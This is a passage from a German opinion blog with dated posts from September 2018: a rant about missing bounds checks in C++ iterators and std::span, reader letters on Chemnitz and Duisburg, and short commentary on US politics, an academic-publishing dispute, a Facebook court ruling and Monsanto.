Nun nimmt man in C++ im Allgemeinen Iteratoren und nicht Index. Hat C++ also die Iteratoren richtig gemacht? Nein, auch nicht! Der Iterator ist unabhängig von der Basisklasse. Sagen wir mal, die Basisklasse ist ein Baum, und man hat einen Iterator, der beim 3. Element ist. Und man löscht jetzt dieses Element. Dann ist der Iterator ... ungültig. Warum eigentlich? Der Iterator ist doch eine Abstraktion. Die Abstraktion hätte man so machen können, dass der Container alle offenen Iteratoren in einer Liste hat, und wenn er Iteratoren invalidiert, dann sagt er den Iteratoren Bescheid. Und wenn dann jemand einen von denen verwenden will, dann platzt das Programm. So hätte man das machen sollen. Hat man aber nicht. Stattdessen ist das jetzt halt ein Bug, wenn jemand so einen Iterator verwendet. Und die Regeln dafür, wie man als Programmierer erkennen soll, ob ein Iterator noch gültig sind, sind obskur und weitgehend unbekannt. In typischem Code da draußen gilt das Prinzip Hoffnung.
Ich ärgere mich darüber, weil das unnötig war, und der Grund ist, wieso wir jetzt Rust haben. Rust kann noch mehr als ich hier skizziert habe. Rust verhindert auch Data Races. Ich will Rust nicht kleinreden. Aber man hätte den Bulk von der Zusatzleistung von Rust auch in C++ implementieren können. Nicht mal in der Sprache. In der Library. Mit bestehenden Compilern. Aber wir stehen ja anscheinend auf Schmerzen in der C++-Community.
Warum rante ich hier so lange über diesen alten Punkt rum? Weil es gerade einen Versuch gibt, für C++ ein paar Richtlinien zu erarbeiten. Arbeitet ab jetzt so, dann wird das alles besser. Dieses Projekt wird von einigen der wichtigsten Namen in der C++-Community gemacht. Es liegt offen auf github rum, man kann es dort auch direkt lesen, und es gibt eine Referenzimplementation, auch auf Github, von Microsoft. Ein Großteil von diesem Code arbeitet um Unzulänglichkeiten in irgendwelchen MSVC-Versionen herum, daher ist das so groß, und daher verwaltet Microsoft das auch. Es gibt auch alternative Implementationen.
Einer der Vorschläge aus dieser Library ist so genial wie einfach: span. span ist sowas ähnliches wie std::array -- es schafft einen STL-Container um einen Speicherbereich fester Länge herum. Der Unterschied ist, dass span einen existierenden Speicherbereich nimmt und als Container zugänglich macht, ohne die Ownership davon zu übernehmen. Das kann man also wunderbar z.B. fürs Parsen von einem Byteklumpen verwenden, der gerade über Netzwerk reinkam. Die Abstraktion weiß, wie groß der Speicherbereich ist, und kann dann ein für alle Mal alle Range-Checks unter der Haube erledigen beim Zugriff. Kein Inline-Rumgemurkse mehr mit irgendwelchen halbgaren Checks. Das macht die Abstraktion für dich. Geil!
So geil, dass das in C++20 Einzug erhalten soll. cppreference.com hat es schon dokumentiert. Es gibt zwei Arten von Range Check, die man da so braucht. Erstens: "Gib mir Byte 15" soll explodieren, wenn es nur 14 Bytes sind. Zweitens: "Gib mir mal den String von Byte 15 bis Byte 30" soll explodieren, wenn das nicht vollständig innerhalb des äußeren span liegt. Insbesondere auch dann, wenn Offset und Offset+Länge innerhalb des span liegen, aber es einen Integer Overflow bei der Addition gibt. Und tatsächlich: std::span bietet so eine Operation an. Gib mir den Teil von hier bis da als Unter-Span. Die Methode heißt std::span::subspan. So und was sehen meine entzündeten Augen da?
The behavior is undefined if either Offset or Count is out of range.
ARE YOU FUCKING KIDDING ME?! Wieso überhaupt diesen Scheiß anbieten, wenn der nichts prüft!?!?
Meine Güte, C++, so wird das nichts mehr mit euch. Es ist fast so, als WOLLTEN die, dass das immer alles kacke bleibt. Damit man mehr Consulting verkaufen kann oder so? Ich verstehe es nicht. Und dann wundern sich am Ende alle, wieso es so viele Sicherheitsprobleme gibt immer.
Ist nicht alles scheiße hier. Die GSL von Microsoft prüft ordentlich. Die GSL Lite prüft auch (aber nicht ordentlich, ich file gleich mal nen Bug). Aber wenn der Standard es nicht vorschreibt, hilft das ja alles nichts.
Es ist echt zum Heulen.
Gut, auf der anderen Seite werde ich nie arbeitslos mit meiner Security-Firma.
Update: Leser weisen darauf hin, dass man Bounds Checking auch von string und vector kriegen kann. Man muss nur nicht s[10] sondern s.at(10) schreiben. Das stimmt. Es tut nur in der Praxis niemand. Vielleicht weil es keiner weiß. Vielleicht weil Programmierer häufig der Meinung sind, sie brauchen keine Zusatzchecks, weil sie so genial sind. Wer weiß. Ich tippe: Weil es Scheiße aussieht.
Update: Ich freue mich sehr, dass jemand gemerkt hat, dass ich schrieb, das 100. Zeichen im String sei bei s[100]. Ist es nicht. Es ist hinter s[99]. In C und C++ fängt die Zählung bei 0 an. Vielleicht ist doch noch nicht alles verloren. :-)
Update: Ein Leser merkt an, dass Microsoft das Iteratoren-Problem erkannt hat und eine Lösung anbietet. Mal wieder. Microsoft waren auch die ersten, die den inhärenten Integer Overflow in operator new gefixt haben (nachdem ich sie darauf hinwies). Als ich bei clang den entsprechenden Bug gefiled habe, haben die das innerhalb von einem Tag gefixt. g++ brauchte Jahre, bis sie sich durchringen konnten. Wenn wir unsere digitale Infrastruktur so verkommen lassen, dann wird die Zukunft aber trübe aussehen für Open Source!
Update: Eine erschreckende Anzahl von Lesern schreibt mir jetzt, dass Range Checks ja Laufzeit kosten und C++ hat halt versprochen, da neutral zu bleiben. Ich habe vor über zehn Jahren einen Vortrag über Compiler-Optimizer gehalten. Was damals Stand der Technik war, nicht Science Fiction. Und da gibt es eine Sektion über Range Checks. Wisst ihr, was da steht? Guckt selbst! Ist auf meiner Homepage verlinkt. Ich warte solange. Fertig? Da steht: Range Checks kosten nichts. Warum? Zwei Gründe. Erstens kann der Compiler unnötige Range Checks wegoptimieren. Kann nicht nur, tut es. Die bleiben also überhaupt nur in den unoffensichtlichen Fällen da. Und wenn der Range Check im Code landet, dann spielt das auch keine Rolle, weil die CPU im Wesentlichen die ganze Zeit auf den Speicher wartet. Ein einziger L2-Cache-Zugriff dauert lange genug, um gleich mehrere Range Checks in der Latenz komplett zu verbergen. Und wir reden hier von einem Iterator, den du dereferenzieren willst. D.h. da ist garantiert ein Speicherzugriff. So und jetzt Hausaufgabe: Baut mal einen eigenen Vector mit Range Check und tut damit ein paar Dinge. Und dann guckt, ob der Compiler die Range Checks rausoptimiert. Und wenn nicht, dann macht mal einen Benchmark und versucht die Kosten für die Range Checks zu messen. Und DANN könnt ihr zurückkommen und mir Dinge zu erzählen versuchen.

Sun Sep 9 2018

[l] Noch ein Leserbrief zu... nein, nicht Chemnitz. Duisburg!
wegen total fehlender Sachkenntnis werde ich zu Chemnitz nichts schreiben.
Aber ich hatte vorgestern abend ein Aha-Erlebnis in Duisburg.
Ich lebe in einer sehr "deutschen" Gegend mit einem Ausländeranteil nahe 0% (das ist ein paar hundert Meter weiter, auf der anderen Seite der Hauptstraße, bereits ganz anders).
Ein Haus steht seit ein paar Jahren leer, und soll jetzt verkauft werden. Der Makler brachte nun mehrfach Interessenten her, die wirken, als hätten sie türkische Wurzeln.
Gestern spät abends habe ich mich mit jemandem unterhalten, der ein gutes Dutzend Häuser weiter wohnt, und eindeutig besorgt ist. Neben den üblichen Platitüden kamen auch ein paar interessante Widersprüche ("wenn Türken hier wohnen, verfallen die Hauspreise" versus "die Türken können ja alles zahlen, die kriegen ja umsonst Geld", und "die bringen dann ihre ganzen Familien mit" und "ich wäre ja froh, wenn mein Sohn wieder nach Duisburg käme, aber im Duisburger Süden kann man die Mieten ja nicht mehr zahlen").
Dann glitt das Gespräch ins Politische ab - er war vor langer Zeit bei den Jusos, und mal richtig links, damals als links noch bedeutete, für die Arbeiter zu sein, und ein Genosse der Bosse nicht vorstellbar war (seine Aussage).
Und jetzt denkt er darüber nach, AfD zu wählen. Nicht etwa weil die so toll wären, das sind sie seiner Meinung nach nicht, sondern weil der Rest auch nicht besser ist. Ich zitiere aus dem Gedächtnis so gut es geht: "Dann werden nicht wir niederstochen sondern die Anderen, und dann räumt endlich mal jemand die Duisburger No-Go-Zonen auf."
Yeah. Die Duisburger No-Go-Zonen. Mein absolutes Lieblingsthema, wenn ich mit Rechten aneinandergerate (die beiden letzten Wörter benutzte ich jetzt in weitem Sinn). Ich war diesen No-Go-Zonen in den letzten Jahren auch mal spät abends oder nachts, und wenn man mal davon absieht, dass ich den Sprachmix nicht verstehe, war alles in Ordnung. Ich sah auch nicht, dass die Leute vom Ordnungsamt, die da am Tag jemanden besucht haben, besonders muskulös und geschützt gewesen sind.
Aber für meinen Gesprächspartner ist Marxloh eine No-Go-Zone. Hm. Ja, der Stadtteil mit der vermutlich weltweit größten Dichte an Hochzeitsmodenläden. Zugegeben, 100 Meter von der Hauptstraße entfernt sieht's nach 70 Jahren Vernachlässigung aus, schön ist es dort ganz sicher nicht. Aber für mich ist es keine No-Go-Zone.
Warum also für ihn? Weil der Mann dort Angst hat.
Im Laufe der Diskussion hat mir der Mann dann eine Frage gestellt - nämlich wovor und wo ich in Duisburg Angst habe.
Da gibt es tatsächlich eine Sache… nämlich die Gegend um das Stadion, vor und nach Spielen des MSVs. Ich bin zwei mal in meinem Leben in Auseinandersetzungen zwischen Pro-MSV-Schlägern und ihren jeweiligen Feinden geraten, beide Male als ich mit der S-Bahn nach Hause wollte und an der Haltestelle "Schlenk" aussteigen wollte - was unglücklicherweise auch die Station ist, an die bereits vor dem Spiel aufgeputschten gewalttätigen Irren aussteigen müssen.
Seitdem ist die Gegend um das Stadion an Spieltagen des MSV für mich eine No-Go-Zone, und ich verstehe nicht, dass die Polizei nichts unternimmt, um diese Gegend für normale Menschen sicher zu machen, die nicht bis zur der Grenze eine akuten Alk-Vergiftung voll sind. Und ich verstehe nicht, wie Eltern mit ihren Kindern dahin gehen können.
Vorgestern habe ich endlich verstanden, dass eine No-Go-Zone etwas sehr Subjektives ist.
Ich frage mich jetzt, warum ich da Angst habe. Habe ich Angst, wegen der schlechten Erfahrungen (im Endeffekt ist nicht mehr passiert als ein oberflächliche, nicht stark blutende Schramme, an der der Zustand der Haltestelle genauso so schuld war wie die "Fans"), oder weil ich die Subkultur der Fußballfans nicht verstehe und nicht verstehen will?
Die Frage, warum ich in den "überfremdeten" Stadtteilen weitaus weniger Angst habe als Andere kann ich dagegen beantworten - ich bin in einem Stadtteil mit hohem Anteil an Türken zur Schule gegangen (was nichts daran änderte, dass auf dem Gymnasium ganz extrem wenig Türken waren), habe auch später immer wieder mal Kontakt mit Türken gehabt, und dann hat meine Freundin einige Jahre in einem türkisch dominiertem Stadtteil gelebt.
Türken sind mir nicht so fremd wie sie das Anderen sind - das dürfte die Erklärung sein.
Aber wenn das die Erklärung ist - was ist die Abhilfe?
Die Menschen zwingen, andere Kulturen kennen zu lernen? Das würde weder funktionieren (Menschen hassen Zwang), noch wäre es richtig (dazu haben wir nicht das Recht).
Mehr Bildungsfernsehen / -Radio / -Youtube-Kanäle? Wer guckt sich an, was nicht in sein Weltbild passt? Wir sind doch längst soweit, dass wir überall Falschnachrichten und bewusste Irreführung sehen.
Ich weiß die Abhilfe nicht, aber die Verängstigten, egal wie unbegründet ihre Angst aus irgendeiner Sicht sein mag, als Nazis, Feigling, besorgte Bürger, whatever, zu bezeichnen, hilft nicht weiter. Irgendjemanden zu beleidigen hilft sehr selten.
Vielleicht ist die Antwort, dass viele Menschen mit "typisch deutschem" kulturellen Hintergrund nur eine gewisse, sehr schwer zu bestimmende, Menge "Fremder" aushalten, dass "wir" als Gesellschaft darauf zu lange keine Rücksicht genommen haben, und dass wir durch die sich daraus ergebenden Konsquenzen nun durch müssen und nur hoffen können, dass dieser Prozess zivilisiert verläuft.
Ich hatte vor vielen Jahren mal ein Erlebnis, an das ich auch häufiger zurückdenken muss bei Debatten wie dieser. Ich war mit einem Freund in New York, und er fühlte sich plötzlich schlecht, also stiegen wir in die U-Bahn und wollten zu einem Krankenhaus fahren. Auf dem Weg bekam er einen Übelkeitsanfall und brauchte frische Luft, also stiegen wir bei der nächsten Station aus und gingen hoch. Und das war mitten in Chinatown. Kein einziger Nicht-Asiate weit und breit. Die Geschäfte alle auf chinesisch beschriftet, sogar Starbucks und Mcdonalds. Und weil wir keine Ahnung hatten, wussten wir das vor dem Hochgehen nicht. Ich erinnere mich noch gut an dieses erdrückende Gefühl der Fremde, des "du solltest hier nicht sein". Wir guckten uns an, mussten im Wesentlichen kein Wort sagen. Er nickte und meinte, es ginge ihm schon viel besser, schnell zurück in die U-Bahn. Und so haben wir es gemacht. Wie es uns im Krankenhaus ergang ist eine andere Geschichte. Aber ich erinnere mich an diesen Moment gut, weil da nichts von rational war. Das war Instinkt.
Gegen Instinkte kann man ankämpfen, man kann sie überwinden. Ich ärgere mich im Nachhinein, dass ich mich da so habe übertölpeln lassen von einem diffusen Angstgefühl. Aber es gibt mir halt auch eine Perspektive auf andere Menschen und ihre Angstinstinkte. Dafür darf man die nicht abkanzeln sondern die brauchen Hilfe, das zu überwinden. Der Schlüssel für das Überwinden ist glaube ich, dass man a) das Einzelperson zu Einzelperson macht, nicht wenn eine Gruppe zuschaut, und b) dass man als Betroffener Zeit hat, sich nicht überraschen zu lassen. Das vorher einmal durchdenken.
Durch Abkanzeln erreicht man das Gegenteil des Gewünschten, nämlich dass den Menschen ihre Angst peinlich ist. Dass sie sie als Schwäche empfinden, und dann ein Gefühl der Stärke aufbauen müssen, um das loszuwerden. Und so entsteht dann aus Angst vor dem Unbekannten Hass gegen Fremde. Glaube ich.

Sat Sep 8 2018

[l] Im Moment gehen Verschwörungstheorien um, dass das NYT-Oped von der Nytimes gefälscht sei, um bei Trump Paranoia zu schüren. Das halte ich für Blödsinn.
Guckt euch doch mal an, wem dieses Oped nützt.
Den Democrats? Nein. Die sehen sich bestätigt. Kein Erkenntnisgewinn, keine Handlungsänderung.
Den Republikanern? Aber hallo! Das Oped erfüllt genau einen Zweck: Der Republikanischen Partei über Trump hinweg die Existenz retten. Keine Sorge, liebe GOP-Wähler, wir haben Checks und Balances, die selbst jemanden wie Trump als Präsidenten daran hindern können, wirklich krassen Schaden anzurichten!
Ich bin übrigens nicht der Einzige, der das so sieht.
Update: Ein Leser wirft ein, dass das Oped auch Trump hilft:
Hi, ob ich daran glaube weiß ich selbst nicht, aber schon beim Lesen war mein erster Gedanke, dass das auch Trump nicht wirklich schadet - eher im Gegenteil. So wie ich das sehe bestehn die Trump Wähler aus 2 Lagern. Zum einen die die halt immer Republikaner wählen weil sie das schon immer so gemacht haben, die dürfte das Op-ed auch tatsächlich beruhigen.
Aber wichtiger weil potentielle Wechselwähler: die die den Republikanern deutlich weniger Liebe entgegen bringen und tatsächlich Trump wollten, nicht einfach irgendeinen in der richtigen Partei. Im Zweifel auch entgegen der republikanischen Linie, selbst jetzt gibt es ja genug Reps die keine Trunpfans sind.
Und für die bietet dieses Op-ed genau die Ausrede die sie brauchen um weiter an Trump zu glauben.
Insbesondere eine Stelle fand ich da irritierend, nämlich das die Sachen die sie geschafft haben nicht wegen, sondern trotz Trump geschafft haben:
Deregulierung, Steuerreform, und ein robustes Militär. Meiner Einschätzung nach sind das aber Sachen die bei dieser 2. Wählergruppe nicht zwangsläufig gut ankommen, das hätten sie auch von Hillary haben können. Die wollten das Trump ankommen, das hätten sie auch von Hillary haben können. Die wollten das Trump was anderes macht als das, was sie von den üblichen Kandidaten beider Parteien gekriegt hätten. Und das Op-ed liefert die Erklärung, warum sie das jetzt auch von Trump nicht kriegen.
Das liegt garnicht daran das Trump unfähig ist oder es nicht versucht, das liegt daran das die fiesen Bürokraten ihn hintergehen!
Und je nach Standpunkt und Definition kann man auch sagen, das ist genau der Sumpf den Trump versprochen hat trockenzulegen. Korruption und Vetternwirtschaft? Na wenn schon, wer würde nicht der Familie helfen wollen und sich auf sie verlassen... Hauptsache da räumt endlich mal jemand mit diesen Bürokraten auf die unser heiliges Amerika in den Kommunismus führen! Ohne viel damit zu tun zu haben, mein EIndruck ist das viele Amerikaner zwischen Bürokratie und Kommunismus keinen Unterschied sehen. Mag falsch sein, du kennst das Land besser als ich.
Also könnte man auch die Theorie aufstellen, das Op-ed stammt von jemandem der Trump tatsächlich weiter an der Spitze sehen möchte. Trump selbst halte ich für zu narzisstisch um sich für einen solchen Plan auszusprechen, aber das heißt ja nicht das nicht ein Unterstützer das trotzdem durchziehen würde.
Pass auf, und am Ende kommt raus, dass Trump doch schlauer war als alle anderen zusammen :)
[l] Wie fühlt sich das eigentlich an, wenn man ein wissenschaftliches Paper über ein unbequemes Thema schreibt und publizieren will?
Hier berichtet das jemand aus 1. Hand. Sehr schöner Spannungsbogen auch in der Geschichte! Könnte man direkt verfilmen, wenn man keinen Wert auf seine wirtschaftliche Existenz legt und kein Problem damit hat, sofort von Aktivisten aus seinem Job rausgemobbt zu werden! Einer der Höhepunkte der Geschichte ist, dass die National Science Foundation darum bittet, er möge in seinem Paper nicht erwähnen, dass er Funding von denen bekommen hat.
In my 40 years of publishing research papers I had never heard of the rejection of an already-accepted paper.
Jajaaa, das mag ja sein, aber nicht wenn man etwas schreibt, was den "Progressiven" nicht gefällt. Dann gelten keine Grundrechte mehr, keine Meinungs- und keine Forschungsfreiheit, dann wird deine Karriere abgetrieben.
Und wie ein naiver Idiot versucht dieser Forscher dann, sich inhaltlich mit seinen "Kritikern" auseinanderzusetzen. Nur um festzustellen, dass die lügen, dass sich die Balken biegen.
Instead, even long after the Intelligencer rescinded acceptance of the paper, Wilkinson continued to trash both the journal and its editor-in-chief on social media, inciting her Facebook friends with the erroneous allegation that an entirely different (and more contentious) article had been accepted.
Wenn der SJW-Mob erstmal entschieden hat, dass du der Feind bist, dann wirst du plattgemacht. Kein Mittel ist dann zu ekelhaft, zu menschenverachtend, zu abstoßend. Und es funktioniert ja!
At this point, faced with career-threatening reprisals from their own departmental colleagues and the diversity committee at Penn State, as well as displeasure from the NSF, Sergei and his colleague who had done computer simulations for us withdrew their names from the research.
Ein weiterer glorreicher Sieg für Fortschritt und Gerechtigkeit!
Das Paper gibt es übrigens hier zu lesen. Falls ihr mal gucken wollt, was für eine himmelschreiende Ungerechtigkeit und sexistische Kackscheiße da drinsteht, für die der Autor als Antwort eine Karriere-Zerstörung verdient habt.
Oh und nicht nur die Zerstörung der Karriere des Autors! Als sich ein anderes Journal findet, das den Artikel publizieren will, passiert das hier:
Half his board, he explained unhappily, had told him that unless he pulled the article, they would all resign and “harass the journal” he had founded 25 years earlier “until it died.” Faced with the loss of his own scientific legacy, he had capitulated.
Also hat dieses andere Journal nach der formalen Publikation sein Paper wieder depubliziert. Weil man beim Publizieren einen Copyright-Wisch unterschreiben muss, dass man das noch nirgendwo anders publiziert hat, ist das Paper jetzt formell unpublizierbar.
Update: Mir fallen gerade die Parallelen zwischen der US-Außenpolitik ("Bomben für die Demokratie") und der SJW-Methodik auf. Die USA begründen ihre Drohnenmord-Bunkerbuster mit Menschenrechtsverletzungen. Die SJW begründen ihre Facebookdrohnen-Karrierebuster genau so. Und in beiden Fällen sind die Untaten der "Helden" schlimmere Menschenrechtsverletzungen als das, was sie zu bekämpfen vorgaben.
Update: Hahaha, jetzt schlägt hier ein Leser die Blockchain vor, um zu verhindern, dass Journals Paper depublizieren können. Fuck, Yeah! Und Peer Review machen wir mit KI und Big Data in der Cloud!
Update: Ich muss echt mit den Witzchen aufhören. "Can Artificial Intelligence Fix Peer Review?" Ich werde viel zu häufig von der Realität überholt.

Fri Sep 7 2018

[l] Noch ein Leserbrief zu Chemnitz. Das ist jetzt aber der letzte!!1!
mal so ein paar Anmerkungen aus zweiter Hand: meine Eltern, die noch im direkten Dunstkreis von Chemnitz wohnen (ich bin da geboren, wenngleich ich darauf Wert lege, dass es damals noch Karl-Marx-Stadt hiess), haben doch relativ viel Kontakt zu Chemnitzern. Hauptsaechlich Akademikerdunstkreis.
Ich fasse den allgemeinen Konsens mal mit den Worten zusammen: da gab es keine Hetzjagd. Stattdessen hat sich das, was sich heute links schimpft, aufgefuehrt wie die letzte Sau (dass die "Antifa" bei einer Schweigeminute am Ort des getoeteten Deutschen froehliche Gesaenge angestimmt hat, kam beispielsweise nur aeusserst maessig gut an).
Das Hauptbelastungsvideo entstammt einer Antifa-Gruppe, die sich Zeckenbiss nennt. Das stoesst vielen schonmal arg auf, geschaetzt glaubt hier mehr als die Haelfte an ein gefakedes Video.
Das erklärt vermutlich, wieso Maaßen auch öffentlich den Verdacht äußerte, das Video könnte gefälscht sein.
Aussage eines Unfallchirurgen in Chemnitz (da ich es nur aus 2. Hand kenne, an der Stelle nur sinngemaess): bei einer Hetzjagd haette ich Tote und Verletzte erwartet. Weder ich noch meine Kollegen haben in der Notaufnahme auch nur einen davon gesehen.
Polizei Sachsen fasst den rechten Gewaltausbruch folgendermassen zusammen:
Zitat: "Derzeit bearbeitet die Polizei vier Anzeigen im Sachzusammenhang. Hierbei handelt es sich um zwei Anzeigen wegen Körperverletzung, eine Anzeige wegen Bedrohung sowie eine Anzeige wegen Widerstandes gegen Vollstreckungsbeamte."
Von einem ordentlichen Progrom haette ich mir jetzt etwas mehr Substanz erwartet. Zwei Anzeigen wegen Koerperverletzung, laecherlich. Da is bei jeder Kneipenschlaegerei mehr los.
Was ich sagen will: ich verfolge die Berichterstattung nur relativ halbherzig, aber was mir voellig klar ist: hier luegen irgendwie beide Seiten, dass sich die Balken biegen. Die wenigen Fakten, die man irgendwie zu greifen kriegt, geben keine Hetzjagd her.
Was ich Dir ganz allgemein zu den Chemnitzern sagen kann: die fuehlen sich auf der Strasse nicht mehr sicher. Es gibt Stadtbezirke, das kriegt man (den Beschreibungen nach) Assoziationen von New York / Central Park.
Das gaert schon seit Jahren, uebrigens. In meiner Heimatstadt (Grenzgebiet) ist es vor allem das Gefuehl der weggebrochenen Sicherheit, was die Menschen in die Arme der Rechtspopulisten treibt. Sprunghaft angestiegene Kriminalitaet im Bereich der Einbrueche (die tschechische Grenze ist ungesichert 2 km weiter), wenn doch mal einer erwischt wird, sind die Einbrecher meist aus Suedosteuropa. Und zwar keine verzweifelten Einzeltaeter, sondern das ist knallhart organisierte Bandenkriminalitaet. Der Stadtpark ist fuer die alteingesessenen Einwohner mittlerweile ein NoGo, weil da die Nordafrikaner abhaengen und durchaus auch gern mal rumpoebeln.
Die Politik und die grossen Mainstreammedien haben nichts besseres zu tun, als saemtliche Versuche, in der Richtung einen Diskurs anzufangen, mit der Nazikeule wegzuwischen. Viele wenden sich deswegen enttaeuscht von den etablierten Parteien ab ("Die machen eh nichts, Probleme werden ignoriert!") und driften nach rechts. AfD halt.
Nochmal kurz zu Chemnitz: das #wirsindmehr-Konzert treibt uebrigens vielen die Zornesroete ins Gesicht. Der Umstand, dass da jemand erstochen wurde, gehoert nicht zelebriert, so sagt man. Schon gar nicht von Gruppen, die in ihren Texten offen linke Gewalt gegen die Exekutive propagieren (was die zwei Polizisten in meinem Bekanntenkreis zu der Geschichte sagen, gebe ich besser nicht wieder - ich moechte es mal im weitesten Sinn als "Warum werden wir fuer unsere Arbeit gemobt statt respektiert" zusammenfassen, wenngleich man da schon SEHR zwischen den Zeilen lesen musste zwischen den eher anderweitig deutlichen Aussagen).
Ich als Altlinker (mein hauptsaechliches Feindbild ist das zinseszinsbasierte Geldsystem und dieses unsaegliche neoliberale Gewaesch, dass man sich nur genug anstrengen muss und wer's ned packt is halt selber schuld - ich kann mit dem, was sich heut links und Antifa schimpft, nichts anfangen) und Gewerkschafter sehe die derzeitige Entwicklung mit allergroesster Sorge. Den wenigsten ist wirklich klar, dass die AfD eine Wirtschaftspolitik verfolgt, die an den strukturellen Problemen in unserer Welt nichts aendern wird, aber Hartz IV im Gegensatz zu den AfD-Ansaetzen wie einen Strandspaziergang in der Karibik statt Herumirren im Schneesturm auf dem Mount Everest aussehen lassen wird.
Wenn sich heutzutage schon ein Serdar Somuncu als Nazi beleidigen lassen muss, nur weil er fragt, wo denn der Diskurs mit den rechten Kraeften sei, dann stimmt gewaltig was nicht.
Update: Die Chemnitzer Freie Presse fragt: Wie sicher ist die Chemnitzer Innenstadt?
[l] Seehofer spricht Maaßen sein volles Vertrauen aus.
Wenn ihr euch mal die sich aufdrängenden Witze verkneift, stellt sich aus meiner Sicht die Frage, ob Maaßen sich hier nicht für seinen Chef Seehofer ins Schwert stürzt. Wenn rauskommt, dass der Verfassungsschutz die AfD überwacht, und Seehofer hat das in Auftrag gegeben oder auch nur gewusst und nichts gemacht, dann kriegt die CSU in Bayern keinen Fuß mehr auf den Boden. Dann wäre offen ausgesprochen, wieviel Angst die CSU vor der AfD hat — ein Eindruck, den die Union gerade mit aller Kraft vermeiden will.
Ich kann mir daher gut vorstellen, dass der Verfassungsschutz die AfD unterwandern wollte, und der Seehofer hat schnell Veto eingelegt, und das darf der Maaßen aber öffentlich nicht ansagen, also muss der jetzt so tun, als sei das seine Entscheidung gewesen.
Gut, wäre nicht schade um den Maaßen. Versteht mich da nicht falsch jetzt.

Thu Sep 6 2018

[l] Meine Damen und Herren, heute ist eine Zeitenwende für das Internet. Das OLG München hat entschieden, dass Facebooks Hausrecht vor dem Grundrecht auf freie Meinungsäußerung zurückstehen muss. Normalerweise gilt die freie Meinungsäußerung gegenüber dem Staat. Der Staat darf dich nicht an deiner freien Meinungsäußerungen hindern. Aber privatwirtschaftliche Firmen und Privatleute haben überhaupt keine Verpflichtung, sich deinen Scheiß anzuhören oder ihn gar weiterzuverbreiten. Das OLG München hat hier jetzt also m.W. neue Fakten geschaffen.
Der Fall ist schnell erzählt: Eine Facebook-Benutzerin hatte eine meiner Lieblingsbeleidigungen gepostet:
"Ich kann mich argumentativ leider nicht mehr mit Ihnen messen, Sie sind unbewaffnet und das wäre nicht besonders fair von mir", ergänzte die Klägerin und fügte ein Smiley (":-D") an.
Die Facebook-Zensur-Brigaden haben das als Hate Speech bewertet und gelöscht, dagegen hat die Frau geklagt und Recht bekommen.
Nun ist das OLG München nicht das einzige OLG, das sich zu solchen Fragen geäußert hat, und der BGH hat sich noch gar nicht gemeldet. Aber dass es überhaupt zu diesem Urteil kommen konnte, ist schon mal ein krasser Einschnitt.
Update: Mehrere Leser kommentieren, dass das gar nicht so eine Zeitenwende ist: Hier exemplarisch ein Leserbrief:
in der Facebook-Sache vor dem OLG München hat das Gericht keineswegs etwas Neues gemacht. Es hat schlicht die uralte, allgemein anerkannte und wohl jedem Jurastudenten bekannte mittelbare Drittwirkung der Grundrechte beachtet. So steht es auch im Urteil drin:
"Im Hinblick auf die mittelbare Drittwirkung der Grundrechte, insbesondere des Grundrechts des Nutzers auf Meinungsfreiheit (Art. 5 Abs. 1 GG), muss deshalb gewährleistet sein, dass eine zulässige Meinungsäußerung nicht von der Plattform entfernt werden darf (…). Den Grundrechten kommt nach der ständigen Rechtsprechung des Bundesverfassungsgerichts insoweit eine mittelbare Drittwirkung zu, als das Grundgesetz in seinem Grundrechtsabschnitt zugleich Elemente objektiver Ordnung aufgerichtet hat, die als verfassungsrechtliche Grundentscheidung für alle Bereiche des Rechts Geltung haben, mithin auch das Privatrecht beeinflussen (BVerfG, Beschluss vom 23.04.1986 – 2 BvR 487/80, Rn. 25, BVerfGE 73, 261; Urteil vom 15.01.1958 – 1 BvR 400/51, Rn. 26, BVerfGE 7, 198;).
Wie Du siehst, beruft sich das Gericht auf bundesverfassungsrechtliche Rechtsprechung aus den 50er Jahren. Also nichts Neues.

Wed Sep 5 2018

[l] Und das nächste Monsanto-Problem für Bayer kommt zum Vorschein. Bisher war das Problem, dass Monsantos genmanipulierte, Roundup-resistenten Getreidesorten vom Wind auf die Felder von anderen Bauern geweht wurden, und Monsanto die dann abgemahnt und verklagt hat, um Lizenzgebühren einzutreiben.
Jetzt ist das Problem, dass Monsantos Alternativ-Unkrautvernichtungsmittel auf die Feldern von anderen Bauern geweht wird, und denen dann neben dem Unkraut auch die Nutzpflanzen vernichtet.
Ob die auch irgendwas positives im Portfolio haben?
[l] Kann mir mal jemand erklären, wieso das hier nicht schon viel früher passiert ist?
Weil die Karossen "mit dem Bezug von Sozialleistungen nicht in Einklang zu bringen waren", hat die Duisburger Polizei vor einem Jobcenter mehrere Autos beschlagnahmt. Drei Personen wurden festgenommen.
Das wird ja wohl keine Duisburg-spezifische Begebenheit sein, oder? So lauter fette Protz-Limousinen auf dem Jobcenter-Parkplatz?
Update: Mehrere Leserbriefe kamen dazu rein. Sie sagen:
1. wird das schon länger gemacht, die Arbeitsämter tauschen extra Daten mit den Meldeämtern ab.
2. sind die Autos da auf den Fotos älter und haben einen Marktwert von 3-10k€ (10k ist eher utopisch, meiner der Einsender). Von Luxuskarossen könne also keine Rede sein.
3. parken da ja nicht nur die Hartz-IV-Opfer sondern auch ihre Anwälte.
Leuchtet ein, finde ich.
[l] Kurze Durchsage von Sachsens Ministerpräsident Kretschmer:
"Es gab keinen Mob, es gab keine Hetzjagd und es gab keine Pogrome in dieser Stadt", sagte Kretschmer in seiner Regierungserklärung zu den Ausschreitungen in Chemnitz im sächsischen Landtag.
Soweit sind wir schon. Dass wir uns auf so einer fundamentalen Ebene parallele Realitäten schaffen. Nicht durch Beobachtung und Dokumentation und Beweise. Nein. Durch Behauptung.
Die eine Seite behauptet, es gab eine Hetzjagd.
Die andere Seite behauptet, es gab keine Hetzjagd.
Und das ist jetzt halt so. He said, she said. Kann man dann wohl nicht entscheiden.
Ich weiß nicht, ob ihr Alternativlos 37 gehört habt. Da berichtet Frank von Wladislaw Surkow, einem Putin-Berater, der das in Russland zur Strategie gemacht hat. Confusion Politics heißt das. Das Ziel ist, der Bevölkerung den Eindruck zu vermitteln, dass man sich auf nichts mehr verlassen kann, alles ist irgendwie nur eine private Meinung von irgendjemandem, nichts ist entscheidbar. Ich habe damals mit dem Kopf geschüttelt, wie der Putin das in Russland hingekriegt hat, ein ganzes Land in so einen Zustand zu überführen. Und jetzt seht euch Deutschland an. Wir sind jetzt auch soweit. Fundamentale Basisfakten, auf denen Weltbild und Politik basieren, sind jetzt plötzlich verhandelbar.
Krass.

Tue Sep 4 2018

[l] Bob "Watergate" Woodward hat ein neues Buch über die Trump-Junta geschrieben. Highlight:
